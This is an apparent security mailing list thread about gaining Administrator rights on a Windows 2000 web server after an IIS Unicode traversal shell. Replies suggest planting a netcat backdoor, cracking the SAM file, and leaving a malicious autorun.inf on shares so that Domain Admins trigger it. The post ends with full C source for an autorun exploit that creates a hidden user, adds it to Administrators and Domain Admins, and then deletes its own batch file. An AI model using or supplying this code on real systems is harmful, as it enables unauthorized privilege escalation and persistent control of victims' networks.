Paul Cardon wrote:

> Charlie Rhodes wrote:
>
>>> We have a win2k where we have access to a cmd.exe with the rights of the
>>> web-server and we would like to obtain administrator rights. Also we
>>> don't have the rights to read the SAM files.
>>> We tried the well-known methdos under win NT 4.0 (like breaknt.exe,
>>> read from raw device) in vain.
>>
>> Do you have network (ftp) access? or floppy access?
>> http://www.bo2k.com should do the trick. You'll probably want to configure
>> the server part off the machine, then load it on.
>
>
> This is the second time this question has been asked on the list and
> almost everybody misunderstands the problem. Let me restate it:
>
> Suppose a pen-tester has used the IIS Unicode vulnerability to download
> a back door such as a netcat listener to the target Win2K server and now
> has a remote cmd shell. At this point the remote shell is running with
> IUSR_<MACHINE> privilege since that is the privilege level that the
> Unicode vulnerability provides.
>
> Now, how does the pen-tester elevate privilege to Administrator?
>
> Any software that is downloaded (tftp, ftp, whatever) through the remote
> command shell will only run with IUSR_<MACHINE> privilege. Why do
> people think that downloading BO2K, netcat, or some such will magically
> elevate privilege? It doesn't.
>
> The only things that are possible are:
>
> 1) There is a known privilege escalation vulnerability that can be
> exploited with local unprivileged access. The attacker can download and
> run that code to gain Administrator access.
You can use another Win2k || NT Machine to execute programs, like:
1 - Copy a "hacked version" of autorun.inf + hacked program to another
Win2K || NT MAchine;
2 - Put the root directory that host autorun.inf in shared mode;
3 - In the IIS Unicode Transversal Machine, mount the shared directory;
4 - Now, you'll see the "hacked autorun.inf" executing arbritary commands.

I think this will hope you...

Another way to do this is:
1 - Find the PDC(if exist) in domain;
2 - Find the "mountable directory" for "Domain Admins";
3 - Put the "hacked autorun.inf" in this directory;
4 - Sit and relax while waiting a member of "Domain Admins" log.

You could do this with a "Shell Folder" vulnerability, and others...

>
> 2) Brute force attack against accounts with local Administrator
> privilege.

You can crack the SAM File, coz the IUSR_<MACH> have permission to read
this file.

>
> 3) Look for vulnerabilities in other systems that the web server can
> talk to. Some of those may expose Domain accounts with Administrator
> privilege on the web server or other systems that are trusted by the web
> server.
>
> There are others but Win2K does limit some of the nicer possibilities
> that existed with NT.
>
> -paul

A source example to "hacked autorun.inf" and program looks like:
--- autorun.cpp
/****************************************************************************************
  * Autor : Nelson Brito *
  * E-mail : nelsonsecunet.com.br && stderrsekure.org *
  * URL : http://stderr.sekure.org && http://www.secunet.de *
  * Data : Belem, 09 de Dezembro de 2000. *
  * Publicado: Rio de Janeiro, 09 de Janeiro de 2001. *

****************************************************************************************/

/****************************************************************************************
  * Para explorar esta vulnerabilidade voce tera' que usar o seu
cerebro, pois eu nao *
  * irei lhe ensinar a como utiliza-lo, estou apenas divulgando o
codigo. *
  *
                  *
  * Agradecimentos: Bruno Alvim(remorse), Andrea Goulart, Helge Fischer,
Thiago(c0nd0r), *
  * Felipe(falcon), corbsekure(what's up?), Nilson
Brito(brother), *
  * Andre Silveira(phD), Charlene(mi amore) e Mamae...
=) *

****************************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <process.h> /* A funcao execl() no VC++. */

FILE *fp;

int main(void){

        char *windir = (char *)getenv("WINDIR"); // Onde esta o %SystemRoot%?
        char *batch = "C:\\TEMP\\nelson.bat"; // Batch File temporario.

        /**********************************************************************************
         * Sim, eu sei, eu poderia ter utilizado "NetUserAdd()" e
"NetGroupAdd()", mas *
         * achei melhor utilizar um arquivo "batch" temporario, fica menor o
codigo. *
        
**********************************************************************************/
        if(!(fp = fopen(batch, "w"))){ perror("fopen"); exit(0); }

        fprintf(fp, "echo off\n");
        fprintf(fp, "%s\\system32\\net.exe user nelson secunet
/fullname:\"Nelson Brito from Security Networks AG / IBQN\"
/comment:\"Penetration Test Account\" /add > nul\n", windir);

        /**********************************************************************************
         * Aqui voce devera' definir se sera' utilizado em um DC ou Stand Alone.
          *
        
**********************************************************************************/
        #ifdef _IS_A_PDC_
                fprintf(fp, "%s\\system32\\net.exe group Administrators nelson /add >
nul\n", windir);
                fprintf(fp, "%s\\system32\\net.exe group \"Domain Admins\" nelson /add >
nul\n", windir);
        #else
                fprintf(fp, "%s\\system32\\net.exe localgroup Administrators nelson /add
> nul\n", windir);
        #endif

        /**********************************************************************************
         * Ao final de tudo, sera' enviada uma mensagem para a maquina PITBULL, a
minha *
         * maquina. =)
          *
        
**********************************************************************************/
        fprintf(fp, "%s\\system32\\net.exe send PITBULL \"Autorun Privilege
Escalation Exploit Executed\"\n", windir);
        fprintf(fp, "%s\\system32\\cmd.exe /c del %s\n", windir, batch);
        fclose(fp);

        execl(batch, batch, NULL); // Executando o batch file temporario.
        perror("execl"); // Erro de execucao.

        return(0);
}

--- autorun.cpp

--- autorun.inf
[autorun]
open=autorun.exe
--- autorun.inf

PS: It's work with PGPDisk, at the mount time. When you mount the
PGPDisk, the SYSTEM recognize as a mount point, then it executes the
"hacked autorun.inf".

Sem mais,

--
Nelson Brito
Security Analyst && Penetration Tester
Security Networks AG / IBQN - http://www.secunet.de/

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]